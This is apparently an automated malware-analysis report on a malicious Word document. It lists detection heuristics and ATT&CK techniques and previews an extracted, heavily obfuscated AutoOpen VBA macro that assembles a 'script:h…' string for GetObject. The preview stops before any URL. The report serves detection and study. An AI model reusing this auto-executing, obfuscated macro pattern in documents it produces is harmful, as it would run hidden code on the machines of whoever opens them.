MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a legacy WordBasic AutoOpen macro. The VBA code is heavily obfuscated, but the presence of GetObject and AutoOpen heuristics indicates an attempt to execute arbitrary code. This macro likely serves to download and execute a secondary payload, a common technique for initial compromise.
Heuristics 7
-
ClamAV: Doc.Malware.Generic-6668084-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6668084-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 39948 bytes |
SHA-256: f49aee159e400a8f568f7e0b5b7e5fad9315e96d142db76101c8b627abce387d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub hAAvAQyvE()
Dim BOgYjIwEfIR
BOgYjIwEfIR = Rnd(1310)
If BOgYjIwEfIR > 53044 Then
BOgYjIwEfIR = Exp(10)
End If
kuDjIiYaiKU = InStr("ZIVubeNsIMOhaaOBOSadon", "ZIVubeNsIMOhaaOBOSadonZIVubeNsIMOhaaOBOSadon")
WifAaUQARATUraDyniSad = Val("94369.3") & "jyjYLiSiwtEg"
Dim waBiTdMOmUwCoBOFuhuPi
Dim aYNOvTiSIGoSILiK
aYNOvTiSIGoSILiK = Rnd(123)
If aYNOvTiSIGoSILiK > 2893 Then
aYNOvTiSIGoSILiK = Exp(3)
End If
mUQOpiCyWaHIbYLOr = Val("9767.4") & "tiKUguCisAXEFYxYRy"
waBiTdMOmUwCoBOFuhuPi = Log(4)
cuTuCOVURyN = InStr("cuhAryHaROpidaPI", "cuhAryHaROpidaPIcuhAryHaROpidaPI")
waBiTdMOmUwCoBOFuhuPi = waBiTdMOmUwCoBOFuhuPi + Log(10)
ReTawHIGULIFoGhY = Val("7000.3") & "mOsoxOHiDeLuC"
Dim PodoaICyievUvAxiRi
xUpOAFehaxyLEzecY = InStr("NUMOCUtoBItIBIN", "NUMOCUtoBItIBINNUMOCUtoBItIBIN")
For PodoaICyievUvAxiRi = 4 To 13
Dim hIGyiOcoKoFUfIbEl
For hIGyiOcoKoFUfIbEl = 9 To 12
Dim iYbOGUQixociXOTamU
iYbOGUQixociXOTamU = Fix(38241)
Next
Dim BORrOwaFylBujEtItYVLi
BORrOwaFylBujEtItYVLi = Fix(67835)
Next
tyDAFAMeSAryNe = Val("91603.6") & "kiidaKimAiIsAsIF"
End Sub
Sub AutoOpen()
MiXabUFeqeHePmujeph = 9407
QyBESEawycETyVyynyKe = 45686
xiscugObSuDYXARO = InStr("tiXYLUhypasIRISO", "tiXYLUhypasIRISOtiXYLUhypasIRISO")
Dim dYZaCUCEsUJEnEQEBA
dYZaCUCEsUJEnEQEBA = Rnd(128)
If dYZaCUCEsUJEnEQEBA > 75609 Then
dYZaCUCEsUJEnEQEBA = Exp(8)
End If
Dim GyrAMAWEZOtYRYNbokO
GyrAMAWEZOtYRYNbokO = Rnd(105)
If GyrAMAWEZOtYRYNbokO > 49625 Then
GyrAMAWEZOtYRYNbokO = Exp(5)
End If
On Error Resume Next
JAhAJeriObavYJiTeNogALa = Val("82235.5") & "BaiEwEdABoSuFOF"
Dim cOKOZubOvIwit
cOKOZubOvIwit = Log(9)
cOKOZubOvIwit = cOKOZubOvIwit + Log(10)
Dim wiiEXAqTiH
SIQEKuPakmuVis = Val("35755.8") & "naoKeWoKoMApAVOBavIH"
wiiEXAqTiH = Rnd(114)
If wiiEXAqTiH > 43903 Then
Dim WtuTehUCAGoWINErAM
WtuTehUCAGoWINErAM = Log(10)
WtuTehUCAGoWINErAM = WtuTehUCAGoWINErAM + Log(11)
wiiEXAqTiH = Exp(4)
End If
Dim QJYSatUNOWVEXhYC
QJYSatUNOWVEXhYC = Log(4)
QJYSatUNOWVEXhYC = QJYSatUNOWVEXhYC + Log(12)
TUpiniBILyseQEMNu = InStr("GIKYkehylEvoC", "GIKYkehylEvoCGIKYkehylEvoC")
vYbIdUpesUF = InStr("ZypYRteztulegBOHePiC", "ZypYRteztulegBOHePiCZypYRteztulegBOHePiC")
riJdariFeKIB = StrReverse(LTrim(""))
PAROPALiVxobEmzady = InStr("roRIauQUbYjOjIdETALaL", "roRIauQUbYjOjIdETALaLroRIauQUbYjOjIdETALaL")
GKUtAkuTyxIrDja = Val("48740.8") & "QEsGEmukenpaGIqIQ"
riJdariFeKIB = riJdariFeKIB + IIf((9 + 18) = 27, "sc", "OxPW")
Debug.Print "DUQIgiKASHomYcEi"
raCYViMAVexuMa = 84635
Dim CImeDyuiIiitIsYxOLJYti
For CImeDyuiIiitIsYxOLJYti = 5 To 10
Dim fEBeVYpAdEkoZBEWUtIc
fEBeVYpAdEkoZBEWUtIc = Fix(88643)
Next
hegAvoVygoLOfXIbySaFacE = 26520
zImASafOsIaeSy = Val("80777.2") & "xELuKobOQULyzakOguTOVYp"
riJdariFeKIB = riJdariFeKIB + IIf((312 + 624) = 936, "ri", "L")
SaHseheBaOJ = Val("65783.3") & "DarInYrIwUZ"
fEnAwIwIbicy = 61648
PNeFEjEqUbURIN = 55530
gaXOGAfAVuWeaewOmEqilO = InStr("HOBAReFoTECkrORIwYnet", "HOBAReFoTECkrORIwYnetHOBAReFoTECkrORIwYnet")
eBEiYvAVuCSUQoMIM = 46041
Debug.Print "TyPUhAcUjaFYJUKogAfLY"
Dim FSoHehagAkUr
For FSoHehagAkUr = 5 To 11
Dim pitowIDiCeWUMol
pitowIDiCeWUMol = Fix(1069)
Next
riJdariFeKIB = riJdariFeKIB + IIf((78 + 156) = 234, "pt", "kJx")
Debug.Print "RoFUWOLuzIiAFYmIJaoq"
Dim FIaoiAJipuToS
For FIaoiAJipuToS = 10 To 11
Dim XyPuGEJekyV
XyPuGEJekyV = Fix(99611)
Next
Dim ZIcyZUSALOJ
ZIcyZUSALOJ = Log(9)
ZIcyZUSALOJ = ZIcyZUSALOJ + Log(13)
LEDucuiyFOPIBIhutomA = InStr("HUboCYaEceBoqUDaKIl", "HUboCYaEceBoqUDaKIlHUboCYaEceBoqUDaKIl")
fuSidIXyFICIY = 67673
riJdariFeKIB = riJdariFeKIB + IIf((294 + 588) = 882, ":h", "6ZmTO")
Dim VOhoCQEXUQAzAZo
For VOhoCQEXUQAzAZo = 2 To 11
Dim lIaevUVoMES
lIaevUVoMES = Fix(10564)
Next
Dim wLOjE
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.